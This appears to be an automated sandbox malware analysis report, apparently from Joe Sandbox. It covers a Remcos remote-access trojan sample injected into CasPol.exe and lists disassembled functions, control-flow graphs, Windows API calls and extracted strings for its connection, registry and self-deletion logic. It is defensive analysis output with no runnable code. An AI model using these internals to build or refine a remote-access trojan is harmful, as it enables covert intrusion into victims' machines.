                                                                              • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->127 128 40da2d call 4069ba 107->128 117 40d9e0-40d9e2 108->117 121 40d9e4-40d9e9 call 40699d call 4064d0 117->121 122 40d9ee-40da01 call 401d64 call 401e8f 117->122 121->122 122->107 138 40da03-40da09 122->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 196 40dbf3 178->196 197 40dbe6-40dbf1 call 436050 178->197 188->163 202 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 196->202 197->202 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 202->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                              APIs
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                              • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                              • API String ID: 2830904901-3665108517
                                                                              • Opcode ID: 293d29213af4237a347d90d2e7037e23f195ebf22a6cfc67f66219c717e1d0c6
                                                                              • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                              • Opcode Fuzzy Hash: 293d29213af4237a347d90d2e7037e23f195ebf22a6cfc67f66219c717e1d0c6
                                                                              • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 582 414b54-414b66 call 4047eb call 4020b4 559->582 565 4142ca-4142d8 call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a686 560->566 578 4142dd-4142df 565->578 566->582 581 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 578->581 578->582 647 414434-414441 call 40541d 581->647 648 414446-41446d call 401e8f call 412513 581->648 595 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 582->595 596 414b8e-414b96 call 401d8c 582->596 595->596 596->476 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->582
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                              • WSAGetLastError.WS2_32 ref: 00414249
                                                                              • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                              • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                              • API String ID: 524882891-2450167416
                                                                              • Opcode ID: a76c98ed69bc72050b5d6320259824a48dd90c3bd02297352f64ccb64420c14b
                                                                              • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                              • Opcode Fuzzy Hash: a76c98ed69bc72050b5d6320259824a48dd90c3bd02297352f64ccb64420c14b
                                                                              • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • connect.WS2_32(?,?,?), ref: 004042A5
                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... | $
                                                                              • API String ID: 994465650-1784135002
                                                                              • Opcode ID: 97530c22e8ac59ad4108418477dc87f58698bb5f1659eac08e909f9c40ed0378
                                                                              • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                              • Opcode Fuzzy Hash: 97530c22e8ac59ad4108418477dc87f58698bb5f1659eac08e909f9c40ed0378
                                                                              • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                              • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                              • String ID:
                                                                              • API String ID: 3658366068-0
                                                                              • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                              • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                              • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                              • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1016 40c89e-40c8c3 call 401e52 1019 40c8c9 1016->1019 1020 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1016->1020 1021 40c8d0-40c8d5 1019->1021 1022 40c9c2-40c9c7 1019->1022 1023 40c905-40c90a 1019->1023 1024 40c9d8 1019->1024 1025 40c9c9-40c9ce call 43ac0f 1019->1025 1026 40c8da-40c8e8 call 41a74b call 401e18 1019->1026 1027 40c8fb-40c900 1019->1027 1028 40c9bb-40c9c0 1019->1028 1029 40c90f-40c916 call 41b15b 1019->1029 1044 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1020->1044 1032 40c9dd-40c9e2 call 43ac0f 1021->1032 1022->1032 1023->1032 1024->1032 1036 40c9d3-40c9d6 1025->1036 1048 40c8ed 1026->1048 1027->1032 1028->1032 1045 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1029->1045 1046 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1029->1046 1041 40c9e3-40c9e8 call 4082d7 1032->1041 1036->1024 1036->1041 1041->1020 1054 40c8f1-40c8f6 call 401e13 1045->1054 1046->1048 1048->1054 1054->1020
                                                                              APIs
                                                                              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LongNamePath
                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                              • API String ID: 82841172-425784914
                                                                              • Opcode ID: 0aed9ec59981cee5dc30913d76a2f12fed1bf19adaefaa5d03a6754d969e8596
                                                                              • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                              • Opcode Fuzzy Hash: 0aed9ec59981cee5dc30913d76a2f12fed1bf19adaefaa5d03a6754d969e8596
                                                                              • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                              • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                              • API String ID: 1866151309-2070987746
                                                                              • Opcode ID: fe419c2785459906763a74068e8ef53e6a02a80517b05617e32006b50ad171bb
                                                                              • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                              • Opcode Fuzzy Hash: fe419c2785459906763a74068e8ef53e6a02a80517b05617e32006b50ad171bb
                                                                              • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1169 4126d2-4126e9 RegCreateKeyA 1170 412722 1169->1170 1171 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1169->1171 1173 412724-412730 call 401eea 1170->1173 1171->1173
                                                                              APIs
                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                              • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                              • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateValue
                                                                              • String ID: HgF$pth_unenc
                                                                              • API String ID: 1818849710-3662775637
                                                                              • Opcode ID: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                              • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                              • Opcode Fuzzy Hash: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                              • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1196 4127d5-4127eb RegCreateKeyA 1197 412818-41281b 1196->1197 1198 4127ed-412812 RegSetValueExA RegCloseKey 1196->1198 1198->1197 1199 412814-412817 1198->1199
                                                                              APIs
                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                              • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateValue
                                                                              • String ID: TUF
                                                                              • API String ID: 1818849710-3431404234
                                                                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1200 4041f1-4041fb 1201 404206-40421e socket 1200->1201 1202 4041fd-404204 call 404262 1200->1202 1204 404220-404223 1201->1204 1205 404224-404261 CreateEventW 1201->1205 1202->1201 1202->1204
                                                                              APIs
                                                                              • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateEventStartupsocket
                                                                              • String ID:
                                                                              • API String ID: 1953588214-2740779761
                                                                              • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                              • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                              • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                              • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1207 413f9a-413fa7 1208 413fb3-413fcb getaddrinfo WSASetLastError 1207->1208 1209 413fa9-413fae call 413e37 1207->1209 1209->1208
                                                                              APIs
                                                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                              • String ID:
                                                                              • API String ID: 1170566393-2740779761
                                                                              • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
